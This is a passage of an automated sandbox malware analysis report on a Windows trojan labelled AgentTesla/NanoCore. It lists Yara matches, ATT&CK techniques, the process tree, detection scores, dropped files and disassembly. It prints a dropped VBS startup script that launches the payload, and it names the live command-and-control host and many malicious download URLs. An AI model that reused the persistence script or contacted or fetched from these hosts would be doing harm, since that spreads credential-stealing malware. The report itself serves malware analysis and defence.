meTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: Yara match -- File source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match -- File source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match -- File source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR
MITRE ATT&CK matrix (one technique per tactic column; leading digits in a cell are the signature-count badges from the original matrix):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 111 Scripting | 2 Registry Run Keys / Startup Folder | 212 Process Injection | 11 Masquerading | 11 Input Capture | 1 System Time Discovery | Remote Services | 11 Input Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 2 Registry Run Keys / Startup Folder | 1 Disable or Modify Tools | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | Exfiltration Over Bluetooth | 1 Remote Access Software | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 212 Process Injection | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 21 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 111 Scripting | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior Graph ID: 629870
Sample: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
Startdate: 19/05/2022
Architecture: WINDOWS
Score: 100
Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 10 other signatures
Processes started from the sample: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe; wscript.exe
692BB93169319EBA2F556174D781A8636D610A67E6838.exe:
• Dropped: C:\Users\user\AppData\...\ople.exe.exe (PE32); C:\Users\user\AppData\...\ople.exe.vbs (data)
• Signatures: Drops VBS files to the startup folder; Writes to foreign memory regions; Maps a DLL or memory area into another process
• Started: RegAsm.exe; conhost.exe
wscript.exe:
• Started: ople.exe.exe
RegAsm.exe (started by 692BB93169319EBA2F556174D781A8636D610A67E6838.exe):
• DNS/IP: dinolachy.duckdns.org 192.169.69.25, ports 49760, 49761, 49762, WOWUS, United States; 127.0.0.1 unknown unknown
• Dropped: C:\Users\user\AppData\Roaming\...\run.dat (data)
ople.exe.exe:
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
• Started: RegAsm.exe; conhost.exe

Source | Detection | Scanner | Label
692BB93169319EBA2F556174D781A8636D610A67E6838.exe | 72% | Virustotal |
692BB93169319EBA2F556174D781A8636D610A67E6838.exe | 41% | Metadefender |
692BB93169319EBA2F556174D781A8636D610A67E6838.exe | 73% | ReversingLabs | Win32.Trojan.AgentTesla
692BB93169319EBA2F556174D781A8636D610A67E6838.exe | 100% | Avira | HEUR/AGEN.1213119
692BB93169319EBA2F556174D781A8636D610A67E6838.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\etwa\ople.exe.exe | 100% | Avira | HEUR/AGEN.1213119
C:\Users\user\AppData\Roaming\etwa\ople.exe.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\etwa\ople.exe.exe | 63% | ReversingLabs | Win32.Trojan.AgentTesla
Source | Detection | Scanner | Label
0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.260000.0.unpack | 100% | Avira | HEUR/AGEN.1213119
3.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
3.0.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
7.0.ople.exe.exe.ab0000.0.unpack | 100% | Avira | HEUR/AGEN.1213119
3.2.RegAsm.exe.56a0000.6.unpack | 100% | Avira | TR/NanoCore.fadte
0.0.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.260000.0.unpack | 100% | Avira | HEUR/AGEN.1213119
7.2.ople.exe.exe.ab0000.0.unpack | 100% | Avira | HEUR/AGEN.1213119
12.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
12.0.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
Source | Detection | Scanner | Label
dinolachy.duckdns.org | 1% | Virustotal |
Source | Detection | Scanner | Label
127.0.0.1 | 1% | Virustotal |
127.0.0.1 | 0% | Avira URL Cloud | safe
dinolachy.duckdns.org | 1% | Virustotal |
dinolachy.duckdns.org | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dinolachy.duckdns.org | 192.169.69.25 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
127.0.0.1 | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
dinolachy.duckdns.org | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.169.69.25 | dinolachy.duckdns.org | United States | 23033 | WOWUS | true

Private IPs:
127.0.0.1
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:629870
Start date and time:19/05/2022 05:18:10 (2022-05-19 05:18:10 +02:00)
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 10s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winEXE@10/4@12/2
      EGA Information:
      • Successful, ratio: 75%
      HDC Information:
      • Successful, ratio: 87.3% (good quality ratio 79.3%)
      • Quality average: 77.4%
      • Quality standard deviation: 31.9%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 36
      • Number of non-executed functions: 46
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Adjust boot time
      • Enable AMSI
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Execution Graph export aborted for target RegAsm.exe, PID 1428 because it is empty
• Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description
05:19:25 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs
05:19:40 | API Interceptor | 1x Sleep call for process: ople.exe.exe modified
Match | Associated Sample Name / URL | Detection | Context
192.169.69.25 | 2AE575F006FC418C72A55EC5FDC26BC821AA3929114EE.exe | malicious | http://192.169.69.25/fakeurl.htm
| 1F7E9C6AED2B8CB929E3677818BD2B72142254E17F790.exe | malicious | strserver1.duckdns.org:8001/is-ready
| F4yQKL3fUH.exe | malicious | alphaputin.duckdns.org/og/charly.bin
| orCJlXSGOG.exe | malicious | alphaputin.duckdns.org/og/charly.bin
| PO20171118-COGRAL SPA.jar | malicious | pluginsrv1.duckdns.org:7756/is-ready
| New Order_R4.jar | malicious | pluginsrv1.duckdns.org:7756/is-ready
| 10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exe | malicious | http://192.169.69.25/fakeurl.htm
| 66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exe | malicious | ipvhosted.duckdns.org/rmarch/fre.php
| ttmPnejtED.js | malicious | pluginsrv.duckdns.org:7744/is-ready
| New Order.xlsx | malicious | systemserverrootmapforfiletrn.duckdns.org/explorer/black.exe
| Your Transport Plan has Changed - Maersk.xlsx | malicious | covidinternationalspreadsoomuchtruehead.duckdns.org/covid/blk.exe
| XQqVczq7eQ.exe | malicious | wetransferfax.duckdns.org/sftp.exe
| http://office365update.duckdns.org | malicious | office365update.duckdns.org/
| TUdme7rF2G.rtf | malicious | wsdykungcommunicationtarisupliermg55gms.duckdns.org/kungdoc/winlog.exe
| http://communicationideadedicatedserversystem.duckdns.org/bns/vbc.exe | malicious | communicationideadedicatedserversystem.duckdns.org/bns/vbc.exe
| doc04483720200602121810.xlsx | malicious | honeysposecurityfileexchangeservice.duckdns.org/org/vbc.exe
| doc04483720200602121810.xlsx | malicious | honeysposecurityfileexchangeservice.duckdns.org/org/vbc.exe
| BBVA-Confirming Facturas Pagadas al Vencimiento.xlsx | malicious | mkpksb2overhypetheykillppelforlifehelgg.duckdns.org/mkpk2doc/regasm.exe
| VqtnFLslNj_Purchase Order.vbs | malicious | onyeeze.duckdns.org:5000/is-ready
| 1.bin.js | malicious | unknownsoft.duckdns.org:7755/is-ready
      No context
Match | Associated Sample Name / URL | Detection | Context
WOWUS | meihao.sh4 | malicious | 216.176.191.230
| yM7xvqb6OL.exe | malicious | 192.169.69.26
| 9BBAF063C0F092D248C755107F8BA10DFF6739A805F95.exe | malicious | 192.169.69.26
| NzDRLmVUQh.exe | malicious | 192.169.69.26
| Pm5WshbKaz.exe | malicious | 192.169.69.25
| SecuriteInfo.com.Trojan.AutoIt.833.17587.exe | malicious | 192.169.69.25
| https://www.portablefreeware.com/?id=693 | malicious | 23.138.32.193
| F60FA93B7851B48E141C57BAC40D8846BE4B3FF3A9EC6.exe | malicious | 192.169.69.25
| FA57F7CBA4406D815947A3A2481842F6B0E1C6D82CB3E.exe | malicious | 192.169.69.25
| i586-20220412-0247 | malicious | 208.115.121.73
| 6C64CD522D7E6F3C0B6F0116271CDE81E35213AD4A360.exe | malicious | 192.169.69.26
| fhGFK34M3e.exe | malicious | 192.169.69.25
| 5058533554DC63236F5945969A20574DF2E2B44982553.exe | malicious | 192.169.69.25
| 2409D1664AD7CBBE19B0991D4BF92303DDA0DE873508E.exe | malicious | 192.169.69.25
| AQMWbVdilD | malicious | 208.87.97.14
| microsoft.hta | malicious | 192.169.69.26
| arm | malicious | 208.115.121.78
| 54C1F3123187554C4637A2D0AB80ABFD06A27D61BB72D.exe | malicious | 192.169.69.25
| HHq5dFupRq.exe | malicious | 192.169.69.25
| 5A8A49E14822787A453E28BB2F0782B91E2A1C7C00720.exe | malicious | 192.169.69.25
      No context
      No context
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1216
      Entropy (8bit):5.355304211458859
      Encrypted:false
      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
      MD5:69206D3AF7D6EFD08F4B4726998856D3
      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      File Type:data
      Category:dropped
      Size (bytes):8
      Entropy (8bit):3.0
      Encrypted:false
      SSDEEP:3:Ll:Ll
      MD5:B0D520A58AFBB2268CEB35E278A4EB33
      SHA1:15B41F5F9DC6456482F03330B5450F3C0784F9A3
      SHA-256:D9BE84474B3876A55B0D1BD3971001A9F50C7F3039CEE9C09209C74E9C2BD316
      SHA-512:7E91CC1295EA5B68E151795ED5D6EC93105546405C02C56DC4A459A47865610D164D40635A0E01F91C4B4F63C353BEA0E7947DD4236BD189231235D0B66C605B
      Malicious:true
      Reputation:low
      Preview:f..dF9.H
      Process:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File Type:data
      Category:dropped
      Size (bytes):304
      Entropy (8bit):3.410548573208775
      Encrypted:false
      SSDEEP:6:xPW+YR4lAINl1fYlfm3OOQd4l1RIlRKUEZglJPZ60mlRA6DA6nMWl1fYlxCv:xQ4lAN0+vcIlRKMJelRRFSji
      MD5:36615C3E591704897CAC5551FFD58553
      SHA1:ABDC43118D030E3716FA302B5E6B5AA6D7FD3C72
      SHA-256:CF648418AC15FCD4CD81C2AD4E289F149B52FCA8A6198F39EFBE52D71C602B04
      SHA-512:ACE72BF54585FD266CCD8732146C8D1BCE5E4731EC44C18A005759622C938D34C435BED0EAC1EEECCAC732EC1C125566862748B101383BAE8D2C16B45525F1D7
      Malicious:true
      Reputation:low
      Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .S.h.e.l.l.V.a.r. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...S.h.e.l.l.V.a.r...E.x.e.c.(.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.e.t.w.a.\.o.p.l.e...e.x.e...e.x.e.".)...S.e.t.S.h.e.l.l.V.a.r. .=.N.o.t.h.i.n.g.
      Process:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File Type:PE32 executable (console) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):409170
      Entropy (8bit):7.3076840802364
      Encrypted:false
      SSDEEP:6144:PuWieVAGW6qGWdFlnHCDFrNAiX1AS0mrSMnBX21Cjna06R8fpR4Qq3fS:PVl+nHAZ19RrSMdd6qFyS
      MD5:CA51A0A9E3EF192B26D9818DC4EC5FF0
      SHA1:7D56B8436D501E6CDA892E61FA29BEEEDF65DA0E
      SHA-256:D0250A0B19CC73D8E6A4C97EA7935BA06BA70DD1FB9EEA8C44AEA396DD792A6E
      SHA-512:1997CFD7D25FFE7BB59A9C8A6F7E009D4B693FF4019B0E6698CEFE9FEBD393848C5F4DE9DD3025354E4059EAAD0B29CE2D3B141ED4586B1C7C8DB76303582F15
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Joe Sandbox ML, Detection: 100%
      • Antivirus: ReversingLabs, Detection: 63%
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f...........8h.....8h......8h.....!......!......!......8h............9......9............9......Rich....................PE..L......]............................."............@.......................................@..................................!.......`..........................8...P...............................p...@............................................text...G........................... ..`.rdata..(Z.......\..................@..@.data........0....... ..............@....gfids.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................................
      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):7.307692888739697
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      File size:409169
      MD5:a93162e62b49a591e0d481e030ffc9ea
      SHA1:b0c48a0fc418977051bea837c16aa7928f654da7
      SHA256:692bb93169319eba2f556174d781a8636d610a67e6838e19300a8a2454cd8b2b
      SHA512:2f5c74acd25c9a7fae88736e25e526155d09d5c1c0f66c833c8e6e0c3dfd74fd7d53438089d5de5a07fd2935a78a27a13d3d6ddeef020d42ecafb38497926c25
      SSDEEP:6144:PuWieVAGW6qGWdFlnHCDFrNAiX1AS0mrSMnBX21Cjna06R8fpR4Qq3fm:PVl+nHAZ19RrSMdd6qFym
      TLSH:E3949D52F29698A5E426B1F8A8359D32122B7D9558348A0B31BB312D4E733D3DC77E0F
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........f.............8h......8h......8h......!.......!.......!.......8h..............9.......9...............9.......Rich...........
      Icon Hash:4552445c54463289
      Entrypoint:0x402212
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x5DDBF1DC [Mon Nov 25 15:23:08 2019 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:695a88385098872b689faf1f231ef8ea
      Instruction
      call 00007FBE38700972h
      jmp 00007FBE3870058Dh
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007FBE3870071Bh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007FBE3870070Ch
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007FBE3870070Eh
      add edx, 28h
      cmp edx, esi
      jne 00007FBE387006ECh
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007FBE387006FBh
      call 00007FBE38700E4Fh
      test eax, eax
      jne 00007FBE38700705h
      xor al, al
      ret
      mov eax, dword ptr fs:[00000018h]
      push esi
      mov esi, 00413794h
      mov edx, dword ptr [eax+04h]
      jmp 00007FBE38700706h
      cmp edx, eax
      je 00007FBE38700712h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      jne 00007FBE387006F2h
      xor al, al
      pop esi
      ret
      mov al, 01h
      pop esi
      ret
      push ebp
      mov ebp, esp
      cmp dword ptr [ebp+08h], 00000000h
      jne 00007FBE38700709h
      mov byte ptr [004137B0h], 00000001h
      call 00007FBE38700C66h
      call 00007FBE387010ECh
      test al, al
      jne 00007FBE38700706h
      xor al, al
      pop ebp
      ret
      call 00007FBE38702A00h
      test al, al
      jne 00007FBE3870070Ch
      push 00000000h
      call 00007FBE387010FDh
      pop ecx
      jmp 00007FBE387006EBh
      mov al, 01h
      pop ebp
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      push esi
      mov esi, dword ptr [ebp+08h]
      test esi, esi
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12114 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x18b90 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f000 | 0xe38 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11a50 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11a70 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x1b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xbf47 | 0xc000 | False | 0.579060872396 | data | 6.64391063708 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x5a28 | 0x5c00 | False | 0.417246942935 | data | 4.87173398485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x13000 | 0x11b8 | 0x800 | False | 0.17236328125 | DOS executable (block device driver \277DN) | 2.05377921789 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids | 0x15000 | 0xac | 0x200 | False | 0.271484375 | data | 1.40558316368 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x18b90 | 0x18c00 | False | 0.210611979167 | data | 4.88160389879 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2f000 | 0xe38 | 0x1000 | False | 0.744140625 | data | 6.17873004973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x164b8 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x16920 | 0x10a8 | data | English | United States
RT_ICON | 0x179c8 | 0x25a8 | data | English | United States
RT_ICON | 0x19f70 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x1e198 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 33554431, next used block 33554431 | English | United States
RT_GROUP_ICON | 0x2e9c0 | 0x4c | data | English | United States
RT_VERSION | 0x161f0 | 0x2c8 | data | English | United States
RT_MANIFEST | 0x2ea10 | 0x17d | XML 1.0 document text | English | United States
DLL | Import
